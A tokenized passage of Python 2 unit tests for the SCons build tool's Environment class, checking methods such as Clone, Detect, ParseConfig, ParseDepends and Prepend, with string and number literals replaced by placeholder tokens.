<EOL> class TestA : <EOL> pass <EOL> env1 = self . TestEnvironment ( XXX = TestA ( ) , YYY = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> ZZZ = { <NUM_LIT:1> : <NUM_LIT:2> , <NUM_LIT:3> : <NUM_LIT:4> } ) <EOL> env2 = env1 . Clone ( ) <EOL> env2 . Dictionary ( '<STR_LIT>' ) . append ( <NUM_LIT:4> ) <EOL> env2 . Dictionary ( '<STR_LIT>' ) [ <NUM_LIT:5> ] = <NUM_LIT:6> <EOL> assert env1 . Dictionary ( '<STR_LIT>' ) is env2 . Dictionary ( '<STR_LIT>' ) <EOL> assert <NUM_LIT:4> in env2 . Dictionary ( '<STR_LIT>' ) <EOL> assert not <NUM_LIT:4> in env1 . Dictionary ( '<STR_LIT>' ) <EOL> assert env2 . Dictionary ( '<STR_LIT>' ) . has_key ( <NUM_LIT:5> ) <EOL> assert not env1 . Dictionary ( '<STR_LIT>' ) . has_key ( <NUM_LIT:5> ) <EOL> env1 = self . TestEnvironment ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> assert hasattr ( env1 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert env1 . b1 . object == env1 , "<STR_LIT>" <EOL> env2 = env1 . Clone ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:2> } ) <EOL> assert env2 is env2 <EOL> assert env2 == env2 <EOL> assert hasattr ( env1 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert env1 . b1 . object == env1 , "<STR_LIT>" <EOL> assert not hasattr ( env2 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert hasattr ( env2 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert env2 . b2 . object == env2 , "<STR_LIT>" <EOL> def foo ( env ) : env [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> def bar ( env ) : env [ '<STR_LIT>' ] = <NUM_LIT:2> <EOL> def baz ( env ) : env [ '<STR_LIT>' ] = <NUM_LIT:3> <EOL> env1 = self . TestEnvironment ( tools = [ foo ] ) <EOL> env2 = env1 . Clone ( ) <EOL> env3 = env1 . Clone ( tools = [ bar , baz ] ) <EOL> assert env1 . get ( '<STR_LIT>' ) is <NUM_LIT:1> <EOL> assert env1 . get ( '<STR_LIT>' ) is None <EOL> assert env1 . get ( '<STR_LIT>' ) is None <EOL> assert env2 . get ( '<STR_LIT>' ) is <NUM_LIT:1> <EOL> assert env2 . get ( '<STR_LIT>' ) is None <EOL> assert env2 . get ( '<STR_LIT>' ) is None <EOL> assert env3 . get ( '<STR_LIT>' ) is <NUM_LIT:1> <EOL> assert env3 . get ( '<STR_LIT>' ) is <NUM_LIT:2> <EOL> assert env3 . get ( '<STR_LIT>' ) is <NUM_LIT:3> <EOL> env1 = self . TestEnvironment ( CCFLAGS = '<STR_LIT>' , XYZ = '<STR_LIT>' ) <EOL> env2 = env1 . Clone ( CCFLAGS = '<STR_LIT>' , <EOL> XYZ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> x = env2 . get ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env2 . get ( '<STR_LIT>' ) <EOL> assert x == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , x <EOL> env1 = self . TestEnvironment ( FLAGS = CLVar ( '<STR_LIT>' ) ) <EOL> x = env1 . get ( '<STR_LIT>' ) <EOL> assert x == [ '<STR_LIT>' , '<STR_LIT>' ] , x <EOL> env2 = env1 . Clone ( ) <EOL> env2 . Append ( FLAGS = '<STR_LIT>' ) <EOL> x = env2 . get ( '<STR_LIT>' ) <EOL> assert x == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , x <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> env = self . TestEnvironment ( tools = [ '<STR_LIT>' ] , toolpath = [ test . workpath ( '<STR_LIT>' ) ] ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> env = env . Clone ( tools = [ '<STR_LIT>' ] ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> real_value = [ <NUM_LIT:4> ] <EOL> def my_tool ( env , rv = real_value ) : <EOL> assert env [ '<STR_LIT>' ] == rv [ <NUM_LIT:0> ] <EOL> env [ '<STR_LIT>' ] = rv [ <NUM_LIT:0> ] + <NUM_LIT:1> <EOL> env = self . TestEnvironment ( ) <EOL> real_value [ <NUM_LIT:0> ] = <NUM_LIT:5> <EOL> env = env . Clone ( KEY_THAT_I_WANT = <NUM_LIT:5> , tools = [ my_tool ] ) <EOL> assert env [ '<STR_LIT>' ] == real_value [ <NUM_LIT:0> ] , env [ '<STR_LIT>' ] <EOL> real_value [ <NUM_LIT:0> ] = <NUM_LIT:6> <EOL> env = env . Clone ( KEY_THAT_I_WANT = <NUM_LIT:6> , tools = [ my_tool ] ) <EOL> assert env [ '<STR_LIT>' ] == real_value [ <NUM_LIT:0> ] , env [ '<STR_LIT>' ] <EOL> def test_Copy ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> env2 = env1 . Copy ( ) <EOL> env1copy = env1 . Copy ( ) <EOL> assert env1copy == env1copy <EOL> assert env2 == env2 <EOL> env2 . Replace ( YYY = '<STR_LIT>' ) <EOL> assert env2 == env2 <EOL> assert env1 != env2 <EOL> assert env1 == env1copy <EOL> def test_Detect ( self ) : <EOL> """<STR_LIT>""" <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . subdir ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sub1 = test . workpath ( '<STR_LIT>' ) <EOL> sub2 = test . workpath ( '<STR_LIT>' ) <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> test . write ( [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> test . write ( [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : [ sub1 , sub2 ] } ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x is None , x <EOL> test . write ( [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : [ sub1 , sub2 ] } ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> test . write ( [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> else : <EOL> test . write ( [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> test . write ( [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : [ sub1 , sub2 ] } ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x is None , x <EOL> sub2_xxx_exe = test . workpath ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> os . chmod ( sub2_xxx_exe , <NUM_LIT:0> <NUM_LIT> ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : [ sub1 , sub2 ] } ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> sub1_xxx_exe = test . workpath ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> os . chmod ( sub1_xxx_exe , <NUM_LIT:0> <NUM_LIT> ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : [ ] } ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x is None , x <EOL> def test_Dictionary ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' , ZZZ = '<STR_LIT:z>' ) <EOL> assert env . Dictionary ( '<STR_LIT>' ) == '<STR_LIT:x>' <EOL> assert env . Dictionary ( '<STR_LIT>' ) == '<STR_LIT:y>' <EOL> assert env . Dictionary ( '<STR_LIT>' , '<STR_LIT>' ) == [ '<STR_LIT:x>' , '<STR_LIT:z>' ] <EOL> xxx , zzz = env . Dictionary ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert xxx == '<STR_LIT:x>' <EOL> assert zzz == '<STR_LIT:z>' <EOL> assert env . Dictionary ( ) . has_key ( '<STR_LIT>' ) <EOL> assert env . Dictionary ( ) . has_key ( '<STR_LIT>' ) <EOL> assert env . Dictionary ( ) . has_key ( '<STR_LIT>' ) <EOL> assert env . Dictionary ( ) . has_key ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' <EOL> env [ '<STR_LIT>' ] = '<STR_LIT:foo>' <EOL> assert env . Dictionary ( '<STR_LIT>' ) == '<STR_LIT:foo>' <EOL> del env [ '<STR_LIT>' ] <EOL> assert not env . Dictionary ( ) . has_key ( '<STR_LIT>' ) <EOL> def test_FindIxes ( self ) : <EOL> "<STR_LIT>" <EOL> env = self . TestEnvironment ( LIBPREFIX = '<STR_LIT>' , <EOL> LIBSUFFIX = '<STR_LIT>' , <EOL> SHLIBPREFIX = '<STR_LIT>' , <EOL> SHLIBSUFFIX = '<STR_LIT>' , <EOL> PREFIX = '<STR_LIT>' , <EOL> SUFFIX = '<STR_LIT>' ) <EOL> paths = [ os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> assert paths [ <NUM_LIT:0> ] == env . FindIxes ( paths , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert paths [ <NUM_LIT:1> ] == env . FindIxes ( paths , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert None == env . FindIxes ( paths , '<STR_LIT>' , '<STR_LIT:POST>' ) <EOL> paths = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> assert paths [ <NUM_LIT:0> ] == env . FindIxes ( paths , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert None == env . FindIxes ( paths , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert paths [ <NUM_LIT:1> ] == env . FindIxes ( paths , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_ParseConfig ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( COMMAND = '<STR_LIT>' , <EOL> ASFLAGS = '<STR_LIT>' , <EOL> CCFLAGS = [ '<STR_LIT>' ] , <EOL> CPPDEFINES = [ ] , <EOL> CPPFLAGS = [ '<STR_LIT>' ] , <EOL> CPPPATH = '<STR_LIT:string>' , <EOL> FRAMEWORKPATH = [ ] , <EOL> FRAMEWORKS = [ ] , <EOL> LIBPATH = [ '<STR_LIT:list>' ] , <EOL> LIBS = '<STR_LIT>' , <EOL> LINKFLAGS = [ '<STR_LIT>' ] , <EOL> RPATH = [ ] ) <EOL> orig_backtick = env . backtick <EOL> class my_backtick : <EOL> def __init__ ( self , save_command , output ) : <EOL> self . save_command = save_command <EOL> self . output = output <EOL> def __call__ ( self , command ) : <EOL> self . save_command . append ( command ) <EOL> return self . output <EOL> try : <EOL> save_command = [ ] <EOL> env . backtick = my_backtick ( save_command , <EOL> "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" ) <EOL> env . ParseConfig ( "<STR_LIT>" ) <EOL> assert save_command == [ '<STR_LIT>' ] , save_command <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT:value>' ] ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:string>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:list>' , '<STR_LIT>' , '<STR_LIT:foo>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , env . File ( '<STR_LIT:abc>' ) ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> env . backtick = my_backtick ( [ ] , "<STR_LIT>" ) <EOL> env . ParseConfig ( "<STR_LIT>" ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:string>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , env [ '<STR_LIT>' ] <EOL> env . ParseConfig ( "<STR_LIT>" , unique = <NUM_LIT:0> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:string>' , '<STR_LIT>' , '<STR_LIT:bar>' , '<STR_LIT:bar>' ] , env [ '<STR_LIT>' ] <EOL> finally : <EOL> env . backtick = orig_backtick <EOL> def test_ParseDepends ( self ) : <EOL> """<STR_LIT>""" <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> env = self . TestEnvironment ( SINGLE = test . workpath ( '<STR_LIT>' ) ) <EOL> tlist = [ ] <EOL> dlist = [ ] <EOL> def my_depends ( target , dependency , tlist = tlist , dlist = dlist ) : <EOL> tlist . extend ( target ) <EOL> dlist . extend ( dependency ) <EOL> env . Depends = my_depends <EOL> env . ParseDepends ( test . workpath ( '<STR_LIT>' ) ) <EOL> exc_caught = None <EOL> try : <EOL> env . ParseDepends ( test . workpath ( '<STR_LIT>' ) , must_exist = <NUM_LIT:1> ) <EOL> except IOError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> del tlist [ : ] <EOL> del dlist [ : ] <EOL> env . ParseDepends ( '<STR_LIT>' , only_one = <NUM_LIT:1> ) <EOL> t = map ( str , tlist ) <EOL> d = map ( str , dlist ) <EOL> assert t == [ '<STR_LIT>' ] , t <EOL> assert d == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , d <EOL> del tlist [ : ] <EOL> del dlist [ : ] <EOL> env . ParseDepends ( test . workpath ( '<STR_LIT>' ) ) <EOL> t = map ( str , tlist ) <EOL> d = map ( str , dlist ) <EOL> assert t == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , t <EOL> assert d == [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT:abc>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , d <EOL> exc_caught = None <EOL> try : <EOL> env . ParseDepends ( test . workpath ( '<STR_LIT>' ) , only_one = <NUM_LIT:1> ) <EOL> except SCons . Errors . UserError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> def test_Platform ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( WIN32 = '<STR_LIT:win32>' , NONE = '<STR_LIT>' ) <EOL> exc_caught = None <EOL> try : <EOL> env . Platform ( '<STR_LIT>' ) <EOL> except SCons . Errors . UserError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> exc_caught = None <EOL> try : <EOL> env . Platform ( '<STR_LIT>' ) <EOL> except SCons . Errors . UserError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> env . Platform ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> env . Platform ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> def test_Prepend ( self ) : <EOL> """<STR_LIT>""" <EOL> import UserDict <EOL> UD = UserDict . UserDict <EOL> import UserList <EOL> UL = UserList . UserList <EOL> cases = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT:a>' , '<STR_LIT:3>' ] ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ ] , [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ ] ) , UL ( [ '<STR_LIT:a>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT:a>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ ] , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT:I>' , '<STR_LIT:1>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , '<STR_LIT>' , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , [ '<STR_LIT>' ] , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , UL ( [ '<STR_LIT>' ] ) , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , { '<STR_LIT>' : <NUM_LIT:1> } , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , '<STR_LIT>' , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , [ '<STR_LIT>' ] , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UL ( [ '<STR_LIT>' ] ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , { '<STR_LIT>' : <NUM_LIT:1> } , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ ] , [ ] , <EOL> '<STR_LIT>' , UL ( [ ] ) , UL ( [ ] ) , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ ] , '<STR_LIT>' , [ '<STR_LIT>' ] , <EOL> [ ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> [ ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ ] , '<STR_LIT>' , [ ] , <EOL> [ ] , [ ] , [ ] , <EOL> [ ] , UL ( [ ] ) , UL ( [ ] ) , <EOL> [ ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> [ ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT:O>' , '<STR_LIT:1>' ] ) , <EOL> UL ( [ ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , '<STR_LIT>' , UL ( [ ] ) , <EOL> UL ( [ ] ) , [ ] , UL ( [ ] ) , <EOL> UL ( [ ] ) , UL ( [ ] ) , UL ( [ ] ) , <EOL> UL ( [ ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ ] , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ] <EOL> env = Environment ( ) <EOL> failed = <NUM_LIT:0> <EOL> while cases : <EOL> input , prepend , expect = cases [ : <NUM_LIT:3> ] <EOL> env [ '<STR_LIT>' ] = copy . copy ( input ) <EOL> try : <EOL> env . Prepend ( XXX = prepend ) <EOL> except Exception , e : <EOL> if failed == <NUM_LIT:0> : print <EOL> print "<STR_LIT>" % ( repr ( input ) , repr ( prepend ) , e ) <EOL> failed = failed + <NUM_LIT:1> <EOL> else : <EOL> result = env [ '<STR_LIT>' ] <EOL> if result != expect : <EOL> if failed == <NUM_LIT:0> : print <EOL> print "<STR_LIT>" % ( repr ( input ) , repr ( prepend ) , repr ( result ) , repr ( expect ) ) <EOL> failed = failed + <NUM_LIT:1> <EOL> del cases [ : <NUM_LIT:3> ] <EOL> assert failed == <NUM_LIT:0> , "<STR_LIT>" % failed <EOL> env [ '<STR_LIT>' ] = UL ( [ '<STR_LIT:foo>' ] ) <EOL> env . Prepend ( UL = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , UL ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:b>' , '<STR_LIT:a>' , '<STR_LIT:r>' , '<STR_LIT:foo>' ] , result <EOL> env [ '<STR_LIT>' ] = CLVar ( [ '<STR_LIT:foo>' ] ) <EOL> env . Prepend ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:bar>' , '<STR_LIT:foo>' ] , result <EOL> env3 = self . TestEnvironment ( X = { '<STR_LIT>' : <NUM_LIT:7> } ) <EOL> env3 . Prepend ( X = { '<STR_LIT>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:9> } , Y = { '<STR_LIT>' : <NUM_LIT:10> } ) <EOL> assert env3 [ '<STR_LIT:X>' ] == { '<STR_LIT>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:9> } , env3 [ '<STR_LIT:X>' ] <EOL> assert env3 [ '<STR_LIT:Y>' ] == { '<STR_LIT>' : <NUM_LIT:10> } , env3 [ '<STR_LIT:Y>' ] <EOL> env4 = self . TestEnvironment ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:11> } ) <EOL> env4 . Prepend ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:12> } ) <EOL> assert env4 [ '<STR_LIT>' ] == { '<STR_LIT>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:12> } , env4 [ '<STR_LIT>' ] <EOL> assert hasattr ( env4 , '<STR_LIT>' ) <EOL> assert hasattr ( env4 , '<STR_LIT>' ) <EOL> def test_PrependENVPath ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = self . TestEnvironment ( ENV = { '<STR_LIT>' : r'<STR_LIT>' } , <EOL> MYENV = { '<STR_LIT>' : 